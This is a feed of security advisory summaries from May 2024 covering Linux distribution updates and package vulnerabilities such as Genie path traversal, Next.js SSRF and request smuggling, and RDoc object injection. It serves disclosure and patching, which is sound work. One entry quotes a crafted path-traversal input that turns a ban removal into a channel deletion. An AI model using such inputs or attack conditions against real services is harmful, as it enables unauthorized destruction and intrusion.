10.05.2024 17:34:18	rockylinux	[RLBA-2024:2472] libtdb bug fix and enhancement update (none)	An update is available for libtdb.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2472
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2493] nftables bug fix and enhancement update (none)	An update is available for nftables.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2493
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2488] device-mapper-persistent-data bug fix and enhancement update (none)	An update is available for device-mapper-persistent-data.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2488
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2489] libbpf bug fix and enhancement update (none)	An update is available for libbpf.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2489
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2494] firewalld bug fix and enhancement update (none)	An update is available for firewalld.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2494
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2496] iptables bug fix and enhancement update (none)	An update is available for iptables.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2496
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2497] lvm2 bug fix and enhancement update (none)	An update is available for lvm2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2497
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2501] iw bug fix and enhancement update (none)	An update is available for iw.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2501
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2502] rpcbind bug fix and enhancement update (none)	An update is available for rpcbind.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2502
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2510] libtirpc bug fix and enhancement update (none)	An update is available for libtirpc.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2510
10.05.2024 17:34:18	rockylinux	[RLSA-2024:2512] file security update (low)	An update is available for file.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2512
10.05.2024 17:34:18	rockylinux	[RLBA-2024:2515] iproute bug fix and enhancement update (none)	An update is available for iproute.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2515
10.05.2024 17:34:19	rockylinux	[RLBA-2024:2518] expat bug fix and enhancement update (none)	An update is available for expat.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2518
10.05.2024 17:34:19	rockylinux	[RLBA-2024:2520] bash-completion bug fix and enhancement update (none)	An update is available for bash-completion.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:2520
10.05.2024 17:34:19	rockylinux	[RLSA-2024:2679] libxml2 security update (moderate)	An update is available for libxml2.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2679
10.05.2024 17:34:19	rockylinux	[RLSA-2024:2517] wpa_supplicant security update (moderate)	An update is available for wpa_supplicant.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2517
10.05.2024 17:34:19	rockylinux	[RLSA-2024:2570] gnutls security update (moderate)	An update is available for gnutls.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2570
10.05.2024 17:34:19	rockylinux	[RLSA-2024:2571] sssd security and bug fix update (moderate)	An update is available for sssd.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2571
10.05.2024 17:34:15	rockylinux	[RLSA-2024:2758] kernel security and bug fix update (moderate)	An update is available for kernel.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2758
10.05.2024 03:00:00	debian	[DSA-5687-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5687-1
10.05.2024 03:00:00	oraclelinux	[ELSA-2024-2780] nodejs:18 security update (important)	nodejs[1:18.20.2-1]- Removes .ps1 files- Rebase to 18.20.2- Fixes: CVE-2024-27983, CVE-2024-28182, CVE-2024-27982, CVE-2024-25629nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2780
10.05.2024 21:03:03	maven	[MAVEN:GHSA-WPCV-5JGP-69F3] Genie Path Traversal vulnerability via File Uploads (critical)	### OverviewPath Traversal Vulnerability via File Uploads in Genie ### ImpactAny Genie OSS users running their own instance and relying on the filesystem to store file attachments submitted to the Genie application may be impacted. Using this technique, it is possible to write a file with any user-specified filename and file contents to any location on the file system that the Java process has write access - potentially leading to remote code execution (RCE).Genie users who do not store these attachments locally on the underlying file system are not vulnerable to this issue. ### DescriptionGenie's API accepts a multipart/form-data file upload which can be saved to a location on disk. However, it takes a user-supplied filename as part of the request and uses this as the filename when writing the file to disk. Since this filename is user-controlled, it is possible for a malicious actor to manipulate the filename in order to break out of the default attachment storage path and perform path traversal. Using this technique it is possible to write a file with any user specified name and file contents to any location on the file system that the Java process has write access to.### PatchesThis path traversal issue is fixed in Genie OSS v4.3.18. This issue was fixed in https://github.com/Netflix/genie/pull/1216 and https://github.com/Netflix/genie/pull/1217 and a [new release](https://github.com/Netflix/genie/releases/tag/v4.3.18) with the fix was created. Please, upgrade your Genie OSS instances to the new version.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WPCV-5JGP-69F3
10.05.2024 00:31:38	npm	[NPM:GHSA-G49Q-JW42-6X85] thelounge may publicly disclose of all usernames/idents via port 113 (low)	Per RFC 1413, The unique identifying tuple includes not only the ports, but also the both addresses. Without the addresses, the information becomes both non-unique and public:- If multiple connections happen to use the same local port number (which is possible if the addresses differ), the username of the first is returned for all, resulting in the wrong ident for all but the first.- By not checking the connection address, the information becomes public. Because there is only a relatively small number of local ports, and the remote ports are likely to be either 6667 or 6697, it becomes trivial to scan the entire range to get a list of idents.To prevent this from happening, disable identd or upgrade to a non vulnerable version.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G49Q-JW42-6X85
10.05.2024 00:18:58	npm	[NPM:GHSA-FR5H-RQP8-MJ6G] Next.js Server-Side Request Forgery in Server Actions (high)	### ImpactA Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.#### Prerequisites* Next.js (`<14.1.1`) is running in a self-hosted* manner.* The Next.js application makes use of Server Actions.* The Server Action performs a redirect to a relative path which starts with a `/`.\* Many hosting providers (including Vercel) route requests based on the Host header, so we do not believe that this vulnerability affects any Next.js applications where routing is done in this manner.### PatchesThis vulnerability was patched in [#62561](https://github.com/vercel/next.js/pull/62561) and fixed in Next.js `14.1.1`. ### WorkaroundsThere are no official workarounds for this vulnerability. We recommend upgrading to Next.js `14.1.1`.### CreditVercel and the Next.js team thank Assetnote for responsibly disclosing this issue to us, and for working with us to verify the fix. Thanks to:Adam Kues - AssetnoteShubham Shah - Assetnote	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FR5H-RQP8-MJ6G
10.05.2024 00:07:01	npm	[NPM:GHSA-77R5-GW3J-2MPF] Next.js Vulnerable to HTTP Request Smuggling (high)	### ImpactInconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions.For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js.### PatchesThe vulnerability is resolved in Next.js `13.5.1` and newer. This includes Next.js `14.x`.### WorkaroundsThere are no official workarounds for this vulnerability. We recommend that you upgrade to a safe version.### Referenceshttps://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-77R5-GW3J-2MPF
09.05.2024 20:46:06	ubuntu	[USN-6770-1] Fossil regression	Fossil regression	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6770-1
09.05.2024 20:03:34	suse	[SUSE-SU-2024:1581-1] Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP2) (important)	Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP2)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1581-1
09.05.2024 19:56:13	go	[GO-2024-2721] Cross site scripting in github.com/tiagorlampert/CHAOS	A malicious actor may be able to extract a JWT token via malicious "/command"request. This is a form of cross site scripting (XSS).	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2721
09.05.2024 18:54:15	ubuntu	[USN-6769-1] Spreadsheet::ParseXLSX vulnerabilities (medium)	Several security issues were fixed in libspreadsheet-parsexlsx-perl.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6769-1
09.05.2024 17:33:42	suse	[SUSE-SU-2024:1580-1] Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP3) (important)	Security update for the Linux Kernel (Live Patch 39 for SLE 15 SP3)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1580-1
09.05.2024 16:48:41	suse	[SUSE-SU-2024:1579-1] Security update for sssd (important)	Security update for sssd	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1579-1
09.05.2024 16:47:20	suse	[SUSE-SU-2024:1578-1] Security update for sssd (important)	Security update for sssd	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1578-1
09.05.2024 16:13:10	ubuntu	[USN-6768-1] GLib vulnerability	GLib could be made to accept spoofed D-Bus signals.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6768-1
09.05.2024 14:18:39	suse	[SUSE-SU-2024:1574-1] Security update for go1.21 (moderate)	Security update for go1.21	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1574-1
09.05.2024 14:18:26	suse	[SUSE-SU-2024:1573-1] Security update for go1.22 (moderate)	Security update for go1.22	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1573-1
09.05.2024 14:18:15	suse	[SUSE-SU-2024:1572-1] Security update for python-Werkzeug (important)	Security update for python-Werkzeug	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1572-1
09.05.2024 14:18:01	suse	[SUSE-SU-2024:1571-1] Security update for python-pymongo (important)	Security update for python-pymongo	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1571-1
09.05.2024 14:17:29	suse	[SUSE-SU-2024:1569-1] Security update for avahi (moderate)	Security update for avahi	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1569-1
09.05.2024 14:17:16	suse	[SUSE-SU-2024:1568-1] Security update for ghostscript (moderate)	Security update for ghostscript	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1568-1
09.05.2024 12:01:09	suse	[SUSE-SU-2024:1563-1] Security update for sssd (important)	Security update for sssd	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1563-1
09.05.2024 07:13:02	go	[GO-2024-2822] Arbitrary code execution in github.com/tiagorlampert/CHAOS	A remote attacker can execute arbitrary commands via crafted HTTP requests.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2822
09.05.2024 15:14:55	almalinux	[ALSA-2024:2778] nodejs:20 security update (important)	nodejs:20 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2778
09.05.2024 15:12:52	almalinux	[ALSA-2024:2780] nodejs:18 security update (important)	nodejs:18 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2780
09.05.2024 03:00:00	debian	[DSA-5682-2] glib2.0	regression update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5682-2
09.05.2024 03:00:00	debian	[DSA-5686-1] dav1d (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5686-1
09.05.2024 03:00:00	freebsd	[FREEBSD:D53C30C1-0D7B-11EF-BA02-6CC21735F730] PostgreSQL server -- Potentially allowing authenicated database users to see data that they shouldn't.	PostgreSQL project reports: A security vulnerability was found in the system views pg_stats_ext and pg_stats_ext_exprs, potentially allowing authenticated database users to see data they shouldn't. If this is of concern in your installation, run the SQL script /usr/local/share/postgresql/fix-CVE-2024-4317.sql for each of your databases. See the link for details.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:D53C30C1-0D7B-11EF-BA02-6CC21735F730
09.05.2024 03:00:00	freebsd	[FREEBSD:EC994672-5284-49A5-A7FC-93C02126E5FB] electron29 -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-3914. Security: backported fix for CVE-2024-4558.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:EC994672-5284-49A5-A7FC-93C02126E5FB
09.05.2024 03:00:00	oraclelinux	[ELSA-2024-2778] nodejs:20 security update (important)	nodejs[1:20.12.2-2]- Backport nghttp2 patch for CVE-2024-28182[1:20.12.2-1]- Rebase to version 20.12.0 Fixes: CVE-2024-27983 CVE-2024-27982 CVE-2024-22025 (node) Fixes: CVE-2024-25629 (c-ares)nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2778
09.05.2024 03:00:00	redhat	[RHSA-2024:2778] nodejs:20 security update (important)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.Security Fix(es):* c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629)* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)* nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025)* nodejs: CONTINUATION frames DoS (CVE-2024-27983)* nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2778
09.05.2024 03:00:00	redhat	[RHSA-2024:2780] nodejs:18 security update (important)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: CONTINUATION frames DoS (CVE-2024-27983)* nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025)* nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982)* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)* c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2780
09.05.2024 03:00:00	redhat	[RHSA-2024:2779] nodejs:18 security update (important)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: CONTINUATION frames DoS (CVE-2024-27983)* nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025)* nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982)* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)* c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2779
09.05.2024 00:50:04	go	[GO-2024-2821] Denial of Service from untrusted requests in github.com/stacklok/minder (high)	HandleGithubWebhook is susceptible to a denial of service attack from anuntrusted HTTP request. An untrusted request can cause the server to allocatelarge amounts of memory resulting in a denial of service.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2821
09.05.2024 03:00:00	freebsd	[FREEBSD:EE6936DA-0DDD-11EF-9C21-901B0E9408DC] tailscale -- Insufficient inbound packet filtering in subnet routers and exit nodes	Tailscale team reports: In Tailscale versions earlier than 1.66.0, exit nodes, subnet routers, and app connectors, could allow inbound connections to other tailnet nodes from their local area network (LAN). This vulnerability only affects Linux exit nodes, subnet routers, and app connectors in tailnets where ACLs allow "src": "*", such as with default ACLs.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:EE6936DA-0DDD-11EF-9C21-901B0E9408DC
09.05.2024 03:00:00	freebsd	[FREEBSD:FBC2C629-0DC5-11EF-9850-001B217B3468] Gitlab -- vulnerabilities	Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FBC2C629-0DC5-11EF-9850-001B217B3468
15.05.2024 03:00:00	mozilla	[MFSA-2024-23] Security Vulnerabilities fixed in Thunderbird 115.11 (high)	In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-23
14.05.2024 23:14:00	npm	[NPM:GHSA-5H5V-HW44-F6GG] Oceanic allows unsanitized user input to lead to path traversal in URLs (moderate)	### ImpactInput to functions such as `Client.rest.channels.removeBan` is not url-encoded, resulting in specially crafted input such as `../../../channels/{id}` being normalized into the url `/api/v10/channels/{id}`, and deleting a channel rather than removing a ban.### Workarounds* Sanitizing user input, ensuring strings are valid for the purpose they are being used for.* Encoding input with `encodeURIComponent` before providing it to the library.### ReferencesOceanicJS/Oceanic@8bf8ee8373b8c565fbdbf70a609aba4fbc1a1ffe	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5H5V-HW44-F6GG
14.05.2024 22:27:14	slackware	[SSA:2024-135-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.11.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-22/ https://www.cve.org/CVERecord?id=CVE-2024-4367 https://www.cve.org/CVERecord?id=CVE-2024-4767 https://www.cve.org/CVERecord?id=CVE-2024-4768 https://www.cve.org/CVERecord?id=CVE-2024-4769 https://www.cve.org/CVERecord?id=CVE-2024-4770 https://www.cve.org/CVERecord?id=CVE-2024-4777 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.11.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.11.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-126.0-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-126.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:0e9a26b221f26fb5463ef7bba9caa110 mozilla-firefox-115.11.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:07aa240561e462cb32a03ebe4d62e5a1 mozilla-firefox-115.11.0esr-x86_64-1_slack15.0.txzSlackware -current package:434d84886cc0b14db6e8b842fff25ac6 xap/mozilla-firefox-126.0-i686-1.txzSlackware x86_64 -current package:058e5714e8cc539ced89668971b69629 xap/mozilla-firefox-126.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.11.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-135-01
15.05.2024 00:47:55	npm	[NPM:GHSA-93PF-MRC8-4G3H] Konga is vulnerable to Cross Site Scripting (XSS) attacks (moderate)	Konga v0.14.9 is vulnerable to Cross Site Scripting (XSS) via the username parameter.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-93PF-MRC8-4G3H
15.05.2024 00:37:55	maven	[MAVEN:GHSA-G95V-3PJ6-J433] Ant Media Server does not properly authorize non-administrative API calls (moderate)	Ant Media Server Community Edition in a default configuration is vulnerable to an improper HTTP header based authorization, leading to a possible use of non-administrative API calls reserved only for authorized users. All versions up to 2.9.0 (tested) and possibly newer ones are believed to be vulnerable as the vendor has not confirmed releasing a patch.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G95V-3PJ6-J433
15.05.2024 00:37:06	maven	[MAVEN:GHSA-338X-HFX8-VX9X] Apache Karaf Cave: Cave SSRF and arbitrary file access (critical)	This issue affects all versions of Apache Karaf Cave.As this project is retired, there are no plans to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-338X-HFX8-VX9X
14.05.2024 23:22:08	maven	[MAVEN:GHSA-M44J-CFRM-G8QC] Bouncy Castle crafted signature and public key can be used to trigger an infinite loop (moderate)	An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M44J-CFRM-G8QC
14.05.2024 23:22:06	maven	[MAVEN:GHSA-V435-XC8X-WVR9] Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack") (moderate)	An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V435-XC8X-WVR9
14.05.2024 23:22:02	maven	[MAVEN:GHSA-8XFC-GM6G-VGPV] Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation. (moderate)	An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8XFC-GM6G-VGPV
14.05.2024 18:11:57	alpinelinux	[ALPINE:CVE-2024-27282] ruby vulnerability	[From CVE-2024-27282] An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27282
14.05.2024 18:11:57	alpinelinux	[ALPINE:CVE-2024-27281] ruby vulnerability	[From CVE-2024-27281] An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. (When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache.) The main fixed version is 6.6.3.1. For Ruby 3.0 users, a fixed version is rdoc 6.3.4.1. For Ruby 3.1 users, a fixed version is rdoc 6.4.1.1. For Ruby 3.2 users, a fixed version is rdoc 6.5.1.1.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27281
14.05.2024 18:11:56	alpinelinux	[ALPINE:CVE-2024-27280] ruby vulnerability	[From CVE-2024-27280] A buffer-overread issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x through 3.0.6 and 3.1.x through 3.1.4. The ungetbyte and ungetc methods on a StringIO can read past the end of a string, and a subsequent call to StringIO.gets may return the memory value. 3.0.3 is the main fixed version; however, for Ruby 3.0 users, a fixed version is stringio 3.0.1.1, and for Ruby 3.1 users, a fixed version is stringio 3.0.1.2.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27280
14.05.2024 18:05:29	alpinelinux	[ALPINE:CVE-2024-25581] dnsdist vulnerability (high)	[From CVE-2024-25581] When incoming DNS over HTTPS support is enabled using the nghttp2 provider, and queries are routed to a tcp-only or DNS over TLS backend, an attacker can trigger an assertion failure in DNSdist by sending a request for a zone transfer (AXFR or IXFR) over DNS over HTTPS, causing the process to stop and thus leading to a Denial of Service. DNS over HTTPS is not enabled by default, and backends are using plain DNS (Do53) by default.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-25581
14.05.2024 14:20:27	ubuntu	[USN-6772-1] strongSwan vulnerability (high)	Fraudulent security certificates could allow access controls to bebypassed.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6772-1
14.05.2024 12:00:08	ubuntu	[USN-6767-2] Linux kernel (BlueField) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6767-2
14.05.2024 03:00:00	cisa	[CISA-2024:0514] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0514
14.05.2024 03:00:00	mozilla	[MFSA-2024-21] Security Vulnerabilities fixed in Firefox 126 (high)	- CVE-2024-4367: Arbitrary JavaScript execution in PDF.js (high)A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context.- CVE-2024-4764: Use-after-free when audio input connected with multiple consumers (high)Multiple WebRTC threads could have claimed a newly connected audio input leading to use-after-free.- CVE-2024-4765: Web application manifests could have been overwritten via hash collision (moderate)Web application manifests were stored by using an insecure MD5 hash which allowed for a hash collision to overwrite another application's manifest. This could have been exploited to run arbitrary code in another application's context. This issue only affects Firefox for Android. Other versions of Firefox are unaffected.- CVE-2024-4766: Fullscreen notification could have been obscured on Firefox for Android (moderate)Different techniques existed to obscure the fullscreen notification in Firefox for Android. These could have lead to potential user confusion and spoofing attacks.This bug only affects Firefox for Android. Other versions of Firefox are unaffected.- CVE-2024-4767: IndexedDB files retained in private browsing mode (moderate)If the <code>browser.privatebrowsing.autostart</code> preference is enabled, IndexedDB files were not properly deleted when the window was closed. This preference is disabled by default in Firefox.- CVE-2024-4768: Potential permissions request bypass via clickjacking (moderate)A bug in popup notifications' interaction with WebAuthn made it easier for an attacker to trick a user into granting permissions.- CVE-2024-4769: Cross-origin responses could be distinguished between script and non-script content-types (moderate)When importing resources using Web Workers, error messages would distinguish the difference between <code>application/javascript</code> responses and non-script responses. This could have been abused to learn information cross-origin.- CVE-2024-4770: Use-after-free could occur when printing to PDF (moderate)When saving a page to PDF, certain font styles could have led to a potential use-after-free crash.- CVE-2024-4771: Failed allocation could lead to use-after-free (moderate)A memory allocation check was missing which would lead to a use-after-free if the allocation failed. This could have triggered a crash or potentially be leveraged to achieve code execution.- CVE-2024-4772: Use of insecure rand() function to generate nonce (low)An HTTP digest authentication nonce value was generated using <code>rand()</code> which could lead to predictable values.- CVE-2024-4773: URL bar could be cleared after network error (low)When a network error occurred 